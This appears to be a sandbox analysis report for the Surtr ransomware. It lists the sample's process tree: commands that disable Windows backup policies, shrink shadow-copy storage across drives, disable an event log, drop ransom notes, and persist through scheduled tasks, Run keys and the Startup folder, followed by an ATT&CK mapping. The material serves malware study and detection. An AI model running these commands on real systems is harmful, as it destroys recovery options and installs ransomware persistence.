  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:2996
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:1516
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2188
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:3668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:3824
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
  2⤵
  PID:1732
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:864
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:5840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3260
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
  2⤵
  PID:5328
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:5452
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:6160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:5648
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:5684
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:6284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5620
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:6224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  PID:5732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:5716
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
  2⤵
  PID:5704
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
  2⤵
  PID:5408
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1664
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:5372
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:5352
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:4104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:5296
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5172
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:6048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:5164
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1448
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
  2⤵
  PID:4548
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
  2⤵
  PID:3176
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
  2⤵
  PID:5884
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6244
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
  2⤵
  PID:5988
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
  2⤵
  PID:6052
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:6028
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:5972
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6720
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
  2⤵
  PID:5952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:5892
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:6140
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:3244
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
  2⤵
  PID:3756
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:6760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:1136
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
  2⤵
  PID:3036
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
  2⤵
  PID:5396
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:4344
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
  2⤵
  PID:4776
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  PID:6076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:6200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_t0pq1466jbkptx.surt" "%TEMP%\Service\PublicData_t0pq1466jbkptx.surt"
  2⤵
  PID:6748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_t0pq1466jbkptx.surt" "%TEMP%\Service\PrivateData_t0pq1466jbkptx.surt"
  2⤵
  PID:6928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:6948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:6968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:6988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:7012
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:7028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:7124
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:7140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:7156
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:3864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4748
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:3252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5916
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:1144

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:5276

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3136

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery